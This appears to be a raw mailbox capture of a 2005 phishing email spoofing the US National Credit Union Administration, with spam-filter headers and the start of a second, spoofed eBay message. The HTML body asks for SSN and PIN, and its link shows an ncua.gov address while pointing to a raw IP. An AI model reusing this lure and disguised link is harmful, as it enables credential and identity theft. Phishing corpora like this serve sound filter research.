From: "acc-activate@ncua.gov" <security@ncua.gov>
Reply-To: "acc-activate@ncua.gov" <support@ncua.gov>
To: josu@uninet.edu
Subject: [*** POSIBLE SPAM***] FCU NOTICE: Important security renewal
Date: Sat, 02 Jul 2005 03:06:20 +0300
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--4649338067825146"
X-Priority: 1
X-MSMail-Priority: High
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at localhost
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at uninet.edu
X-Spam-Status: Yes, hits=24.4 tagged_above=4.0 required=6.5 tests=AWL,
	BAYES_99, FORGED_MUA_AOL_FROM, HTML_40_50, HTML_IMAGE_ONLY_20,
	HTML_MESSAGE, MIME_BOUND_DD_DIGITS, MIME_HTML_ONLY,
	MIME_HTML_ONLY_MULTI, MISSING_MIMEOLE, MPART_ALT_DIFF,
	MSGID_SPAM_CAPS, NORMAL_HTTP_TO_IP, PYZOR_CHECK,
	RAZOR2_CF_RANGE_51_100, RCVD_IN_BL_SPAMCOP_NET, RCVD_NUMERIC_HELO,
	ROUND_THE_WORLD
X-Spam-Level: ************************
X-Spam-Flag: YES
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 87

----4649338067825146
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>NCUA</title>
</head>

<body>
<table width=3D"99%" height=3D"102" 
border=3D0 cellpadding=3D0 cellspacing=3D0 background=3D"http://www.ncua.g=
ov/images/prop/bannerStabwide2.jpg">
  <tr>
  <td width=3D"18%"><A href=3D"http://www.ncua.gov/index.html"><IMG height=
=3D98 
      alt=3D"NCUA Seal" src=3D"http://www.ncua.gov/images/prop/blueseal98.=
gif" width=3D100 
      align=3Dleft border=3D0></A></td>
    <td width=3D"82%" height=3D"102"><H2>National Credit Union Administrat=
ion</H2></td>
  </tr>
</table><table width=3D"553" border=3D"0" cellspacing=3D"0" cellpadding=3D=
"0">
  <tr>
    <td width=3D"553">Dear CU holder account,
      <p>This notice informs you that your Credit Union bank has joined ou=
r Federal Credit Union(FCU) network. For both, our and your security, we a=
re asking you to activate an online account on our database. After activat=
ion you can login on our system with your SSN and your Credit/Debit PIN nu=
mber. </p>
      <p>You must visit the FCU activation page and fill in the form to ac=
tivate your online account:</p>
      <p><a href=3D"http://200.60.235.177/.NCUA/update.htm">http://www.ncu=
a.gov/activate_account.html</a></p>
      <p>In accordance with NCUA User Agreement, you can use your online a=
ccount in 24 hours after activation. We thank you for your prompt attentio=
n to this matter. Please understand that this is a security measure intend=
ed to help protect you and your account.<br>
      </p>
      <p>We apologize for any inconvenience. </p>
      <p>Sincerely, NCUA Account Review Department <br>
      </p>
      <p><hr>
      <br>
          Please do not reply to this e-mail. Mail sent to this address ca=
nnot be answered<br>
          <br>
    </p></td>
  </tr>
</table>

</body>
</html>

----4649338067825146--

From aw45-confirm@ebay.com  Fri Jul  1 23:56:45 2005
Return-Path: <aw45-confirm@ebay.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail1.monkey.org (mail1.monkey.org [65.23.81.153])
	by naughty.monkey.org (Postfix) with ESMTP
	id 84AB5536E90; Fri,  1 Jul 2005 23:56:45 -0400 (EDT)
Received: from mail.com (unknown [217.129.34.6])
	by mail1.monkey.org (Postfix) with SMTP id 8B63B85ACDA;
	Fri,  1 Jul 2005 23:56:43 -0400 (EDT)
